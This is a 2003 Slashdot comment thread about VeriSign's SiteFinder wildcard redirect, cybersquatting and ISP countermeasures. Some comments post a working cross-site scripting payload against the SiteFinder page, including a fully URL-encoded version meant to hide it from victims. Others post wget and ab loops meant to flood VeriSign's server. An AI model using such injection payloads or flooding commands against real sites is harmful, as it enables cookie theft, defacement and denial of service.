Thats part of Verisigns new "Shock and Jaw" Campaign.

Re:Most ISPs have blocked it

[zwoelfk]

OK - I can verify that nifty (a very large provider) here in Japan does not block it. To make it worse, Verisign's page seems to be only available in English (Well, at least not Japanese), so now many people are getting redirected to pages they can't even read. At least Microsoft's version of this was localized.

Re:Most ISPs have blocked it

[rgbrenner]

Earthlink has NOT blocked it

Re:Most ISPs have blocked it

[StarHeart]

All the bind patches, including ISC, that I have tried have bugs. I think ISC will be coming out with a new patch soon.

Re:Most ISPs have blocked it

[holt]

If I hadn't already posted in this discussion I would have modded your post +1 Funny. Well done.

Re:Most ISPs have blocked it

[Jucius+Maximus]

My ISP (which is a small dialup ISP in Canada) has also blocked it:

"The domain you are looking for does not exist. perhaps you have miss-typed the url."

It's followed by a google box and some links to the ISPs pages.

Re:Most ISPs have blocked it

[dammitallgoodnamesgo]

Yahoo BB (another huge Japanese ISP) also aren't blocking it.

Re:Most ISPs have blocked it

[nocomment]

I blocked it too, but it still breaks the DNS system. You shouldn't be blocking requests from the owners of the root servers.

Re:Most ISPs have blocked it

[nd]

They don't need to necessarily block it, they just need to patch their DNS servers to return NXDOMAIN instead of the SiteFinder IP address. You could still access the SiteFinder site by specifying its address specifically...

Re:Most ISPs have blocked it

Telia ADSL (largest swedish provider) have not blocked it either.

Re:Most ISPs have blocked it

[RPoet]

Enough of this, the parent wanted you to reply IF your ISP *has* blocked it. Instead we get a flood of people saying their ISPs have NOT blocked it.

Reminds me of Futurama:

Gypsy: "There is perhaps one way. Have you heard of the monks of Deshuba?"
Fry: "I've... NOT heard of them..."

Re:Most ISPs have blocked it

[Licensed2Hack]

Unfortunately Cox Cable hasn't fixed this.

Re:Most ISPs have blocked it

[pacman+on+prozac]

In the UK I've never actually been able to see the verisign page. My provider is freeserve who get their connectivity from energis, combined they carry a hell of a lot of internet traffic in the UK...freeserve is one of the largest ISPs here for home users.

It still resolves, but the webpage is not visible, I get proxy error instead. FS force use of web-caches and smtp-proxies so I guess the sitefinder is blocked on those, but not the DNS servers.

Re:Most ISPs have blocked it

[pacman+on+prozac]

bleh, its now working so I guess either sitefinder or the proxy was overloaded and its not blocked at all.

One thought, can't people now start sueing verisign for running sucks.com websites?

Re:Most ISPs have blocked it

[kdsolutions]

unconfirmed, but ever since an hour after the article postedd, I have been unable to use this "feature" on my CoreComm dial-up.

P.S. - if you decide to get service through them, please let me know first. I could really use $25 off my bill, and I'm sure you wouldn't mind it off yours ;)

Re:Most ISPs have blocked it

[wizman]

I am the network engineer & co-owner of a small ISP (coastalwave.net) in northern Ohio, with a coverage area of 5 counties or so via wireless. I have null routed the IP address, and will be switching to patched dnscache & bind when I have a chance.

One of our two upstreams (Amplex.net) has redirected traffic to that IP to their own internal site, with a link to a google search and a link explaining the controversy.

Re:Most ISPs have blocked it

[bill_mcgonigle]

I sent them a mail a couple days ago asking them to make .com and .net delegation-only and explained how it breaks my spam filters. I haven't received a response yet but I'll be switching to another ISP even though I've been with them for years if they decide not to fix it.

Re:Most ISPs have blocked it

[WCMI92]

Adelphia Powerlink has blocked it. Fibernet (work ISP) has not...

Great, now the SPAM blocks on the server that checks DNS are toast...

Re:Most ISPs have blocked it

speakeasy has blocked it too

Re:Most ISPs have blocked it

My agency (federal government, has something to do with fish and electricity ;) ), is preparing to block it. Posting anonymously since I'm not an official spokesman /etc.

I'm blocking it on my own domains. I'm also removing the domain names from nsi.com (what the hell, GoDaddy's cheaper anyway) and telling them why I'm doing so.

Re:Most ISPs have blocked it

[Reziac]

Is anyone keeping a list (online, where we all can read it) of what ISPs are blocking Verisign's hijacking?

cybersquatting

[mOoZik]

has been turned over in many legal battles, such as in cases where celebrities or companies sue to get to get their name from the cybersquatter party. I suspect VeriSign will be forced to terminate the feature.

and the IEFT now has an Internet-Draft

[shostiru]

which I just found, draft-main-typo-wcard-02. Worth a look, as is the IETF mailing list archive. They're definitely aware of the problem. I particularly like following paragraph from the Internet-Draft:

An error response that only works correctly in one situation would be as bad as an SMTP server that ignored its input and always produced a fixed sequence of responses: it would work in the one situation it was designed to expect, but cause chaos whenever presented with any other situation.

sounds like the Snubby Mail Rejector, hmm?

Re:and the IEFT now has an Internet-Draft

This is a personal draft, which has no official standing. You, your mother, or any one else can publish one of these.

Re:and the IEFT now has an Internet-Draft

[User8201]

Cool, I'll tell my mom, she'll love that.

Actually I've always wanted to make an Internet Draft.

So this means....

[John+Paul+Jones]

We're on the side of the plaintiff?

It's a bad sign if you're cheering this on. Yes, VeriSign is completely wrong here, but the other party isn't to be lauded, either.

It's kinda like Carrot Top fighting Regis Philbin. Although Regis doesn't suddenly appear when I make a wrong turn.

Is it possible Verisign's move will be irrelevant?

[JayBlalock]

I was just thinking about this. At this point, pretty much the entire Internet has mobilized to counter their redirection trick. ISPs are getting filters installed, virus software is getting rewritten, ICANN will likely jump into the fray any time now.

At the rate things are going, in a couple weeks, no one will be able to get to their search engine site at all, whether they want to or not.

Someone probably deserves recompensation for the hassle, but it's looking like the Internet has proven resilient to even this "high level" attack.

Try this in I.E.

http://www.";alert("fuckverisign");".com

Re:Try this in I.E.

This is not just funny, it actually works!

Re:Try this in I.E.

[Sovern]

How does that work? I'm not a novice, I just don't know anything!

Re:Try this in I.E.

[jasoncart]

First, the domain is not found so it redirects to Verisign. Then Verisign reads the domain name off the URL and puts it in thier HTML page. The domain name happens to be a bit of javascript that then executes when that bit of the page is loaded and shows the msgbox.

BIND Patch

[ksuMacGyver]

Check out http://dropline.net/forums/viewtopic.php?t=1472 If you use Slackware, don't like verisign's sitefinder, and run DNS.

This isn't cybersquatting.

[oneiros27]

There were two main types of cybersquatting, as I saw it --

• buying up random names, and hoping someone would buy it from you (aka. domain speculation)
• buying up specific company names, and charging them obnoxious amounts if they want it (which would end up in court, etc)

In this case, Verisign didn't pay for anything-- they're claiming everything that hasn't been bought. Not only that, but if someone had a domain, but didn't have a host in the domain, they're claiming that as theirs, too.

[Not that I'm surprised...the first sign that things like this were going to happen was when IE started replacing webserver error messages with their own if they decided your error message wasn't big enough, and replacing 'server not found' with links to their search engine]

So well, your 40 acres comparison falls through as it's more the equivalent of someone saying 'all this is mine until someone else buys it' and then, after you buy your plot, they still claim the area that you haven't built on yet, even though you have the deed to it.

don't u love these spokespeople

[hansoloaf]

VeriSign spokesperson Brian O'Shaughnessy said the company has not yet seen the lawsuit and that it doesn't comment on pending litigation."

They should just build an ASIMO robot in the mold of a spokesperson. There would be only 2 lines of code for the robot to speak out everytime they are contacted on a story: "The company has not seen the lawsuit." "No comment" Then we can skip the obligatory spokesperson quote in articles in the future as its' pretty much all they say nowdays.

Re:don't u love these spokespeople

[phauxfinnish]

Then we can skip the obligatory spokesperson quote in articles in the future as its' pretty much all they say nowdays.

Unless you are a SCO spokesperson, then the story would go a little like this:

VeriSign spokesperson Brian O'Shaughnessy said that the company has discovered that ALL internet addresses belong to them and that everyone else is incroaching on their intellectual property. They are currently selling licenses to use their internet addresses for $699 per subdomain. Once the lawsuit begins, the price of these licenses are set to double to $1398 per subdomain. VeriSign requests that all domains be redirected to the SiteFinder address.

Questions reguarding such details as evidence to these claims, Mr. O'Shaughnessy stated, "will be released during the discovery phase of the trial." Until that time, VeriSign suggests that every domain registrant purchase a license, "just in case".

Re:don't u love these spokespeople

ASIMO is way smarter than a spokesperson. And I bet he dances better too. You could replace most spokespeople with this.

another annoying 'feature' of sitefinder

[ApheX]

My browsers - Firebird and IE both keep history for a few days. It used to be that when i accidentally typed something in and the domain could not be found that it wouldn't be in my history since it wouldn't resolve. Now - thanks to URL resolving my history is gradually starting to fill full of crap. So when im in a hurry and select something out of my history i sometimes end up getting a sitefinder page instead of what I was looking for. ARRRGH.

Verisign Sucks. They always have and always will.

Re:another annoying 'feature' of sitefinder

[brucmack]

Heh. Reminds me of the time I accidentally typed "mail.ywahoo.com". Wouldn't you know, Yahoo has helpfully registered that domain for those like me who can't type. From then on, I was helpfully provided with the option to go there whenever I wanted yahoo.

Re:another annoying 'feature' of sitefinder

[kmac06]

Verisign Sucks. They always have and always will.

Agreed. I realized this when I got a phone call two weeks after I registered my first domain asking if I needed their 'services' for hosting. Of course, the sales pitch made it sound like my domain would not work without their services.

I realized this again when I got a letter in the mail telling me to renew a domain b/c it was about to expire. What's the big deal, you say? The domain wasn't registered with them, but they made it sound like if I didn't send THEM money, I was gonna lose it.

Re:another annoying 'feature' of sitefinder

[User8201]

Yeah there was a /. story about that and that is what this story means by the recent deceptive practice ruling, I Think. Also my mom got one of those fake threats; I googled for it and found out lots of people did.

Re:another annoying 'feature' of sitefinder

[Elbow+Macaroni]

Gee, if all the other business' in the world started this sort of practice we would all be getting bogus bills for all sorts of things.

Cable TV bills for people who don't have cable, Book of the Month bills, etc.

Why can these people get away with this when I know if I were to do the same thing I would get smacked down pretty darn quick? How can they continue these practices that are just downright illegal?

I've had to fight for at least 5 or 6 customers who they tried to steal their domain names. They actually did steal one of mine, and then transfered it to one of their other companies and then sold it back to me for $1,200. And they hire these people in India to answer their phones so it seems like they are just incompetent but they aren't. They know exactly what they are doing. What a bunch of creeps they are.

I guess some people will just do anything for money.

Re:another annoying 'feature' of sitefinder

[Reziac]

\windows\hosts:

#127.0.0.1 64.94.110.11 # verisign's hijacking IP
0.0.0.0 sitefinder.verisign.com # ditto

Solves the problem. (2nd one works faster, but I left the commented-out line for reference.) Now my typoes get "No DNS" errors in the expected way.

Re:BIND Patch -- better link

[ksuMacGyver]

Check out this If you use Slackware, don't like verisign's sitefinder, and run DNS.

Give them a break, they just want more hit

[jsse]

and here I come to rescue

while true; do wget --delete-after http://sitefinder.verisign.com/ ; done

If we all do this everyday they'd be very happy and don't need to twist the DNS again! :)

Re:Give them a break, they just want more hit

I'm sure your dial up connection has their server at its knees.

Re:Give them a break, they just want more hit

Awh come on now, we can do better than that! Use the built-in distro-standard apache benchmark tool! ab -n1000 -c100 sitefinder.verisign.com/ That will send out 100 requests at once, 10 times. Might want to increase that number.... Anyway, its a good way to test your bandwidth...

Re:Give them a break, they just want more hit

Maybe we should schedule an internet day where EVERYONE who supports loosing Veri-Slime.com can participate.

Re:Is it possible Verisign's move will be irreleva

[John+Paul+Jones]

Someone probably deserves recompensation for the hassle, but it's looking like the Internet has proven resilient to even this "high level" attack.

At what cost? Routers are working harder, code has been introduced into core servers that has no technical reason to exist, and an IP address, or possibly a sizeable range of IP addresses are now blacklisted worldwide. Those IPs won't be usable for anything anymore, or at least until we see widespread adoption of IPv6. *cough*

What the Internet doesn't need is to become even less of an end-to-end transport, less reliable. And we did it to ourselves.

Popular, eh?

[Anztac]

Popular Enterprises, huh. I wonder if they thought it up before or after the bussiness plan?

Hello, Pot? This is kettle!

[dacarr]

This is a classic example of hypocrisy, but maybe this'll pay off.

Excellent; battle of the twits

[bigberk]

Note the various inaccuracies in the article. First, SiteFinder (despite its name) doesn't "search" for domain or anything; it is simply a wildcard that catches all lookups right on the COM and NET root servers. This is exceedingly simple to setup; there's no 'technology' involved.

Also, users of course do not get a 404 when a domain doesn't exist. The domain freakin' doesn't exist, so the DNS lookup itself fails (should get NXDOMAIN) and the browser reports an error in domain resolution.

But this is nice; I want to see all these leeches in the cybersquatting and "World Wide Web" enhancement business pitted against each other.

Re:Excellent; battle of the twits

[holt]

Well, technically, it does search for the domain. When you go to the page it apparently presents a list of sites you meant to go to. I don't actually know, because my ISP is blocking it.

I guess that in the way you're thinking of it, it's not searching for the domain, but it does implement a search engine.

Don't badmouth Netster too bad

[Tyler+Eaves]

Yes, it's semi-sleazy, but they don't cybersquat.

Timeline:

1997 or so: I registered tylereaves.com, mainly for use in e-mail

2000: I let the domain lapse, not really using it, and tired of paying $40 a year or so for it (Hey, registering was expensive in '97!)

200?: Netster becomes the owner of tylereaves.com

2003: I nicely ask for it back.
2003: I get my domain back. They didn't even charge me the trasnfer fees.

Re:Don't badmouth Netster too bad

[glyph42]

That's very cool. Please elaborate on I nicely ask for it back.

Re:Don't badmouth Netster too bad

[3.1415926535]

It probably involved threatening people with a blessed +2 cluebat.

Re:Don't badmouth Netster too bad

[Tyler+Eaves]

Not at all.

There's a notice on one of their policy pages that they'll give a domain to anyone with a valid claim (Trademark, etc). I e-mailed the provided address, stating that A: I was the original registrant and B: It's my name. They got back to me in under 24 hours to arrange the transfer.

Someone at Network Solutions responded to me.

[xenoweeno]

I sent an email to various VeriSign addresses about their abuse. Somehow one of them got routed to a Network Solutions drone.

The drone informed me in a form letter that VeriSign's practices were "well within the guidelines" established by the document Domain Name System Wildcards in Top-Level Domain Zones.

After deconstructing this, we are left with: VeriSign is within the guidelines of the document VeriSign wrote on the matter.

Uhm...

Re:Someone at Network Solutions responded to me.

[Bronster]

Wow, that document was published 10 days ago. That's best practices for you.

Notice that they only address HTTP and SMTP in the guidelines. I guess there really aren't any other protocols worth speaking of.

(https maybe? Hmm - I wonder what happens there)

Re:Someone at Network Solutions responded to me.

After deconstructing this, we are left with: VeriSign is within the guidelines of the document VeriSign wrote on the matter.

Uhm...

Kinda reminds me of the 80's movie "Rad" where that fat guy from mongoose keeps changing the rules so Crew couldn't get into the hell track race.

Re:Someone at Network Solutions responded to me.

I must have missed that one.

Re:Someone at Network Solutions responded to me.

[MLC2012]

https://asdfhaulshfhasdf.com -- The connection was refused when attempting to contact asdfhaulshfhasdf.com.

ftp> open asdfhaulshfhasdf.com
Connected to asdfhaulshfhasdf.com (64.94.110.11)
421 Service not available, remote server has closed connection
ftp>

telnet> open asdfhaulshfhasdf.com
telnet: asdfhaulshfhasdf.com: Name or service not known
asdfhaulshfhasdf.com: Host name lookup failure
telnet>

$ ping asdfhaulshfhasdf.com
PING asdfhaulshfhasdf.com (64.94.110.11) 56(84) bytes of data.
^C
--- asdfhaulshfhasdf.com ping statistics ---
45 packets transmitted, 0 received, 100% packet loss, time 44011ms

No point in going on, I suppose...

Technical defense against hijacked domains

[ODBOL]

This is a good time to look at Bob Frankston's dotDNS proposal for a layer of reliable but meaningless domain names. dotDNS lookups can be made self-verifiable using public-key signatures, but without the costly chain of trust required by DNSSEC methods. The validity of a dotDNS binding can be verified easily by the querier, without relying at all on the server that provided the putative binding.

dotDNS does not solve the whole problem, since any layer that translates from humanly meaningful names to dotDNS names is still vulnerable to hijacking. But the reliable and verifiable name bindings in dotDNS will make it *much* easier to switch name-resolution services when we are dissatisfied with their policies.

dotDNS is a cheap and immediately deployable positive step toward fixing the DNS mess, requiring no approval by any central agency. It's time for a visionary sponsor to step forward and just do it.

From the...

[lord_paladine]

from the to-all-good-things dept.

more like "from the just-rewards detpt."

Re:From the...

I was thinking "well-that-didn't-take-long"...

Homesteading

That's what it's called.

If it were the gold rush days of the internet, sites like www.greatdeals.com and www.coffee.com and other pretty easily guessed site names would make excellent speculatory investments. Those are all gone now, of course. But in those days was it really that bad to take common words and phrases and register them in hopes of selling them to money flushed dot coms?

Re:Homesteading

[jms]

Homesteading required that the homesteader develop and improve the property in order to receive title. You had to actually live on the land, and farm it, and build a house with a door and window, and after you had proved the land, you would receive title.

Cybersquatters do no such thing. There's a difference between registering coffee.com to build a coffee site and registering www.coffee.com to resell it later. Cybersquatters are more akin to ticket scalpers than to homesteaders.

I'm not surprised...

[Pan+T.+Hose]

Their new ad campaign with naked women went too far in my opinion. They were basically asking to be sued. Didn't they think about the children?

Re:I'm not surprised...

[j0hnn135]

That link looks like some XSS to me. Can any web-app-sec folks confirm? Oh yeah, and down with the twits at Verisign

Re:I'm not surprised...

*that* my friend is humour at it's greatest. Well maybe not, but it's pretty damn funny that they are vunerable to simple browser tricks :)

Re:I'm not surprised...

Their new ad campaign with naked women went too far in my opinion.

Don't you just love those orangutang titties? They could have at least used some nice big round artificial titties. Might as well have a mongoloid on there with her titties out holding a love note.

Re:I'm not surprised...

[lpontiac]

Nice injection attack. Hmm, I wonder if feeding such a URL to a censorware site could get all of verisign.com in some blacklists?

Re:I'm not surprised...

yes, it's a funny use of a serious xss vuln. reading users cookies, reading and filling forms and clicking links is less funny. whoever works at Omniture, Inc. should be fired. reason: unbelievable stupidity.

Re:I'm not surprised...

when the url is decoded it is

http://sitefinder.verisign.com/lpc?url='//--></scr ipt>"//--></script>><font size="
+3"><b>If <em>she</em> loves us then we <em>have</em> to be cool!<br>
<img src="http://www.patrick.fm/boobies/boobies.php/tex t/VeriSign"><br>VeriSign! Hot
babes love us! You should too!<br><br><br><br></font&g t ;|

basically there is a point in the code where the cgi paramater url is assigned to a javascript variable. All that has to happen is close the js var declaration, html comment, and script tag.

http://sitefinder.verisign.com/lpc?url="//--></scr ipt>malicious code<script>

script at end opens another script tag for the original /script tag to work with, it also hides the rest of the javascript

try these links

Obligatory hello world example

Micro$oft

and a goatse.cx version

Re:I'm not surprised...

when the url is decoded it is [...]

Yes, and it can be encoded as:

http://sitefinder.verisign.com/lpc?url=%27%2F%2F%2 D%2D%3E%3C%2F%73%63%72%69%70%74%3E%22%2F%2F%2D%2D% 3E%3C%2F%73%63%72%69%70%74%3E%3E%3C%66%6F%6E%74%20 %73%69%7A%65%3D%22%2B%33%22%3E%3C%62%3E%49%66%20%3 C%65%6D%3E%73%68%65%3C%2F%65%6D%3E%20%6C%6F%76%65% 73%20%75%73%20%74%68%65%6E%20%77%65%20%3C%65%6D%3E %68%61%76%65%3C%2F%65%6D%3E%20%74%6F%20%62%65%20%6 3%6F%6F%6C%21%3C%62%72%3E%3C%69%6D%67%20%73%72%63% 3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%61%74%72 %69%63%6B%2E%66%6D%2F%62%6F%6F%62%69%65%73%2F%62%6 F%6F%62%69%65%73%2E%70%68%70%3F%74%65%78%74%3D%56% 65%72%69%53%69%67%6E%22%3E%3C%62%72%3E%56%65%72%69 %53%69%67%6E%21%20%48%6F%74%20%62%61%62%65%73%20%6 C%6F%76%65%20%75%73%21%20%59%6F%75%20%73%68%6F%75% 6C%64%20%74%6F%6F%21%3C%62%72%3E%3C%62%72%3E%3C%62 %72%3E%3C%62%72%3E%3C%2F%66%6F%6E%74%3E
(as one word, without the spaces inserted by slashdot)

which hides everything from the user who looks at such a link.

I hate your goatse version but I wonder what other creative slashdot hackers will invent. Remember that you can use javascript! Actually, you start inside javascript, so you don't even have to close the <script> tag at all, thanks to nice people at Omniture, Inc.

Re:I'm not surprised...

Hmm, I wonder if feeding such a URL to a censorware site could get all of verisign.com in some blacklists?

With the fully encoded version of the link from this post you might even tell those censors it's a very deep, hard to find link. I'm sure you could find much better images and text for that than this innocent boobies.php. Scary.

Re:I'm not surprised...

[arkanes]

Woo for cross site scripting!

I just want to know where you found a woman willing to let you show her boobies to everyone on slashdot :P

Re:I'm not surprised...

it's a hooker, of course.

Re:I'm not surprised...

[scrytch]

To be fair, that has nothing to do with verisign's land grab, as you could do that to a number of sites. More of stupidity, with sloppy coding at verisign not cleaning the input (good god I hope the same people don't work for the verisign certificate authority). That script injection attack can work on quite a number of sites, not just verisign's.

Re:I'm not surprised...

[BandwidthHog]

Bah. By the time I'm at home and can check out NSFW stuff, they've fixed it and variations on that attack just return a page entitled "Verisign | Try Again."

Fakkers.

Owning a domain you don't use

[Animats]

Owning a domain that wasn't in DNS used to be called a "lame delegation". At one time, about a decade ago, it was considered reasonable to garbage-collect domains that were lame delegations, but that was back before the Internet went commercial. Now you can have all the lame delegations you want.

But why? There's no real market in domain names any more. Verisign tried to make one. GreatDomains used to have thousands of listings, and you'd see things like "Asked: $25,000. Bid: $20." Now Verisign only has "premium domains" on GreatDomains, ones like "record.com". There are only 66 domains for sale, and few sales.

Re:Owning a domain you don't use

[Amomynos+Coward]

> GreatDomains used to have thousands of listings, and you'd see things like "Asked: $25,000. Bid: $20."

Aah those were the days. Some idiot for example paid me $1500 for a T0P10.COM domain...probably buyer didn't understand that the second O is a zero.

Re:Owning a domain you don't use

TH4T W45 M3 Y0U 1N53N5171V3 CL0D!

Re:Owning a domain you don't use

[MrIcee]

• But why? There's no real market in domain names any more. Verisign tried to make one. GreatDomains used to have thousands of listings, and you'd see things like "Asked: $25,000. Bid: $20." Now Verisign only has "premium domains" on GreatDomains, ones like "record.com". There are only 66 domains for sale, and few sales.

I dunno... two months ago I sold instantcoffee.com for $4000. It certainly isn't like it used to be, but a good name can still fetch a price.

Electronic Communication Privacy Act

The Electronic Communication Privacy Act (ECPA) provides that "any person who intentionally intercepts, endeavors to intercept, or procures any other person to intercept or endeavor to intercept, any wire, oral, or electronic communication; . . .shall be punished as provided in subsection (4) or shall be subject to suit as provided in subsection (5).

wherein, "intercept" means the aural or other acquisition of the contents of any wire, electronic, or oral communication through the use of any electronic, mechanical, or other device;

The ECPA also provides that "In a civil action under this section, appropriate relief includes--(1) such preliminary and other equitable or declaratory relief as may be appropriate;(2) damages under subsection (c); and (3) a reasonable attorney's fee and other litigation costs reasonably incurred.

Damages.--The court may assess as damages in a civil action under this section the sum of the actual damages suffered by the plaintiff and any profits made by the violator as a result of the violation, but in no case shall a person entitled to recover receive less than the sum of $1,000.

Seems like a good case can be that emails to mistyped addresses are being intercepted by Verisign. Certainly, the emails where not intended to be sent to Verisign, and they appear to be collecting some information from the email (the from address).

Re:Electronic Communication Privacy Act

[MacKtheHacK]

Good thing I'm keeping track of the time I've spent trying to fix the things Verisign broke! They poked a big hole in my spam filter, and some tools I use to test my network connectivity are now broken in strange ways. It will probably cost me over $1000 to fix this, but probably not enough to make it worth it to hire a lawyer. :-(

When the Blaster and SoBig viruses went around recently, lots of people started filtering ICMP packets at their routers, and my tools that used ping stopped working. I had to code around that. The results of Verisign's actions are causing me some similar problems.

Will someone please explain to me how the effects of Verisign's actions are different from some effects of a virus incident? They have directly interferred with the workings and integrity of my systems. Aren't they in violation of a whole bunch of anti-cracker laws here? Heck, they've directly interfeered with the workings an integrity of millions of computer systems around the world! Where the Attorney General when you need him?

Re:Electronic Communication Privacy Act

It the law had any meaning what so ever, then would not Verisign be in court right now?

Do keep in mind, with wild card resolution all the misdirected mail and hits are going to Verisign.

So until you legal people can put some sense and not feltercarb to this - take your law and burn it. Stop siding with the perps for profit.

When will people learn?

[dmiller]

The enemy of your enemy is not necessarily your friend. Domain and typosquatters are the near bottom of the barrel, just a rung above spammers. Just because they are attacking another bottom-feeder does not make them heros.

Re:When will people learn?

[Feztaa]

True, but it's like street justice. Let the animals wipe themselves out.

Re:When will people learn?

[MoneyT]

True, but it's easier to let the dregs of society wear themselves down while everyone else rallies their defenses.

Re:When will people learn?

All I know is that I am damn embarrassed to live in Orlando, Florida - now more than ever. Why do all scum (spammers, squatters) live down here?

Actually...

[Gzip+Christ]

They screwed up resellerratings.com

Even though the site is perfectly fine, I CAN'T access it without hitting their stupid "finder" for some reason.

Actually, the real cause of the problem is likely not Verisign at all. As Slashdot reported a few days ago, people can read words with the letters in the wrong place so long as the first and the last letter are correct. There's a good chance that you weren't able to find the site because you typed in something like rcsll.aeseerrtingom. See - I bet you wouldn't have even noticed the typo had I not pointed it out! It's amazing how adaptable the human mind is. Please check your spelling and then try again.

--------
The fake Gzip Christ isn't not user number ~0xA6CA7

Verisign delusional

[SnowWolf2003]

In this article on on CNET O'Shaughnessy said "the service has been embraced by end users. "We've seen nothing but very positive results from the Internet community," he said. "Usage is extraordinary. Both individual users and enterprises are giving very positive feedback."

So they are attributing a slashdotting, and a lot of media interest to people being positive about the service. I haven't seen one article, comment or anything that was even remotely positive. What are these guys on?

He also claims they are fully compliant with every RFC. I don't see how this is possible, unless they have found some loophole.

Re:Verisign delusional

[j0hnn135]

It's called PR spin.... and yes it sucks.

As far as the RFCs go, maybe the internet architects never thought of this abuse.

Re:Verisign delusional

www.verisignsucksdonkeyballsandlikesit.com. They're either not looking at their logs or they really like it. On a more serious note, would you expect any corporate drone to admit that greed overruled insight? Especially with a lawsuit at their door? I'm not sure if they're really violating an RFC, but I like to think that RFCs describe *how* to do things, not *what* to do. You can launch perfectly RFC-compliant DoS attacks, but should you?

Re:Verisign delusional

[yourmom16]

Do their packets have the evil bit set?

Re:Verisign delusional

[lfourrier]

You can launch perfectly RFC-compliant DoS attacks...

Not sure about this one. Of course, you can mount a DoS compliant with a RFC, but with all of them? (even restricting all to current standards ? even restricting all to current BCP?)

Re:Verisign delusional

[mph]

So they are attributing a slashdotting, and a lot of media interest to people being positive about the service. I haven't seen one article, comment or anything that was even remotely positive. What are these guys on?

The same thing as the telemarketing firm ATA. Dave Barry used his column to inspire readers to slashdot them by phone. They stopped answering the phone, and provided a recorded message claiming that it was due to "overwhelming positive response to recent media."

Re:Is it possible Verisign's move will be irreleva

[JayBlalock]

Oh, I'm not arguing that it doesn't suck and that Verisign didn't do a very, very naughty thing.

But at the same time, if you take a step back, the rapid mobillization of the response to this is VERY impressive, and the rate at which the Internet is reconfiguring itself to get rid of the trouble is quite amazing.

Remember, three days ago, people were moaning about how this would be a disaster, DNS would be broken, spam filters would be rendered impotent, etc etc.

I'm just saying that, objectively, if you look at this sort of like a body repelling a bacterial attack, the rate at which it's been countered is quite amazing, and shows how well the Internet is fundamentally put together.

Does cybersquatting still work?

[Jason1729]

I run a student quotes website at student.profquotes.com. I'd like to register studentquotes.com but it's in the hands of a cybersquatter. There's no way I'd consider buying it from them, and I doubt anyone else is more likely to want the domain. If I really wanted another domain for studentquotes badly enough, there's too many variations for cybersquatters to be a problem; other TLDs or hyphens already give enough alternatives that it would cost more to register them all than the squatter is asking for studentquotes.com.

Jason
ProfQuotes

Re:Does cybersquatting still work?

[cujo_1111]

You could always register it as www.studquotes.com :)

Re:Does cybersquatting still work?

[Jason1729]

That was one of the first things I considered. I never thought I'd run a porn site though. :)

Jason
ProfQuotes

It might be a good service if it were a service

[Felinoid]

I showed my mother this and she was saying "I don't see the problem"
But she was pulling this up on her PDA
"What if it didn't work on your PDA?"
If my website were to look up some data on a website with an expired domain it could get an error telling it the website dose not exist or it could get sightfinder.

Now this is a great idea that could be done quite well at the ISP level. Modify bind to do the task automaticly if you like or offer users a list of possabilitys.

But if say AT&T wanted to set up this for mlife costummers they'd have a problem as they'd get sitefinder instead.

What's to keep sitefinder from becomming an IE only service? or if they wanted they could say "Mozilla only".
Picture it, Microsoft pays them to lock out non-Windows users and then AoL locks out all Non-Netscape users.

As much as I hate the internal IE error messages what if Microsoft wanted to do this same service and do this as an internal IE message redirecting to Microsofts portal?
And if Google wanted to they could add this to the Google toolbar they could bypass Microsofts little portal but they can't change the way the Internet works and as it works right now if Microsoft, Goggle or AT&T provided this service it would be shut out becouse invalid domain names are resolved to be sitefinder.

Re:It might be a good service if it were a service

[Osty]

But if say AT&T wanted to set up this for mlife costummers they'd have a problem as they'd get sitefinder instead.

Easy. AT&T could setup their mLife DNS servers to point the wildcard at their own site, rather than doing the redirect in the browser software. I'm assuming of course that since mLife is a connectivity package, AT&T would be providing the DNS servers for internet access via their mLife phones.

As much as I hate the internal IE error messages what if Microsoft wanted to do this same service and do this as an internal IE message redirecting to Microsofts portal?

The "friendly error messages" can be turned off in IE. You can't turn off Verisign's wildcards. As well, IE has had the ability to search (and you can pick your engine, though MSN is the default) on failed DNS lookups. Verisign breaks that. Expect Microsoft to be pissed.

And if Google wanted to they could add this to the Google toolbar they could bypass Microsofts little portal but they can't change the way the Internet works and as it works right now if Microsoft, Goggle or AT&T provided this service it would be shut out becouse invalid domain names are resolved to be sitefinder.

Bingo! IE, AOL, and even Mozilla have provided "search on failed DNS" options for quite some time now. Verisign's move breaks all of those. If I were Verisign, I'd be afraid to piss off just Microsoft, but to piss off Microsoft, AOL, Apple (I don't know if Safari has such a feature, but I'd be very surprised if it didn't), and any company that has an interest in Mozilla (IBM, perhaps)? That's just crazy.

If you're providing a "search on non-existent domain" service, you could hack around this by redirecting to your own page when you find a sitefinder page rather than a NXDOMAIN from a failed DNS lookup, but that's kludgy and shouldn't be necessary. In the same way, you can fix Verisign's mess on your own, even if your ISP won't, by running your own caching nameserver with one of the many patches for the various DNS servers that have already sprouted up, but that's again a kludge and shouldn't be necessary. Verisign needs to be kicked in the teeth.

I'd have less of a problem

[KalvinB]

If putting in

www.icarusindi.com

would list

www.icarusindie.com

as a suggested site. But it doesn't. It lists a number of domains that are off quite a few letters more than 1.

If it were at least making an intelligent attempt at getting the user where they wanted to go it could be argued that it is at least useful. Microsoft's search that comes up when you get a DNS error on some domain names is excellent about getting you where you actually wanted to go.

Verisign either gives a half assed attempt at correcting the user or deliberatly ignores domains that aren't registered through them. Despite the fact they get money regardless of who you register through.

Now we just need a credible plaintiff. Preferably a class action suit to maximize damages.

Ben

blah

[SirSlud]

you cant support evil for evil. end of story.

Re:blah

[miu]

you cant support evil for evil. end of story.

But you can laugh and cheer as the two scumbags cut each other up.

And I agree, these Netster people are evil. My upgrade schedule for Privoxy is solely determined by these people or their ilk figuring out new ways to send me ads when I typo a domain.

And like so many illegal things

[Dancin_Santa]

There are no victims.

Re:And like so many illegal things

next time I rape your mom, I'll tell her to sit back and enjoy the ride.

The victim can't be seen. when you register coffee.com and sit on it, you're preventing someone else from registering coffee.com and using it.

Re:And like so many illegal things

[OTR+Dave]

The victim can't be seen. when you register coffee.com and sit on it, you're preventing someone else from registering coffee.com and using it.

Learn the difference between "victim" and "first come-first served".

The Lesser of Two Evils?

[Black+Mage+Balthazar]

Let's see, in this corner we have the mega corporation everyone loves to hate, up against a shady company performing a "service" that domain wanting people loath. Where does one put the money?

Right...

So if we're really lucky, just as the guilty verdict is being read, with the upper level management of both companies present...that asteroid that everyone said was going to destroy civilization twelve years from now, will crash in down on the courthouse, ionizing not only the leadership of both companies, but several ragged hordes of killer attack lawyers as well.

Then when the press questions the astronomers on how their orbital calculations could have been so wrong, the astronomers (being the clever guys they are) will say, "but are calculations were right!" and then erupt in maniacal laughter.

I for one welcome our new...[looks up at the sky]...never mind, I didn't start to say anything. Nope, nothing at all.

